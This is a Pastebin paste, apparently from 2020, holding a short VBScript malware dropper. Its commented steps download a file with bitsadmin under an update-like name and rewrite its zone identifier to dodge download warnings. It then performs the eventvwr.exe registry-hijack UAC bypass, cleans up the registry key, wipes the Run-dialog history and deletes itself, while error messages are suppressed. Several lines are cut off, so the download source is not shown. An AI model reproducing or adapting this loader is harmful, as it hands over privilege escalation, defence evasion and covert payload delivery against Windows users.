Advertisement
iAmTheMilkMan

Untitled

Feb 19th, 2020
83
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.82 KB | None | 0 0
  1. Sub Main()
  2. 'Download File
  3. CreateObject("WScript.Shell").run("cmd /c bitsadmin /transfer SoftUpdat$
  4. 'Set new zoneId
  5. CreateObject("WScript.Shell").run("cmd.exe /C echo [zoneTransfer]ZoneID$
  6. 'Write UAC bypass regkey
  7. CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\s$
  8. 'Trigger UAC bypass
  9. CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true
  10. 'Reset regkey
  11. GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root$
  12. 'Clear the run-dialog history
  13. CreateObject("WScript.Shell").Run("cmd.exe /C reg delete HKEY_CURRENT_U$
  14. 'Remove this script
  15. CreateObject("WScript.Shell").Run "cmd /c del " + WScript.ScriptFullNam$
  16. End Sub
  17. 'Dont wanna display shit
  18. On Error Resume Next
  19. Sub Main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement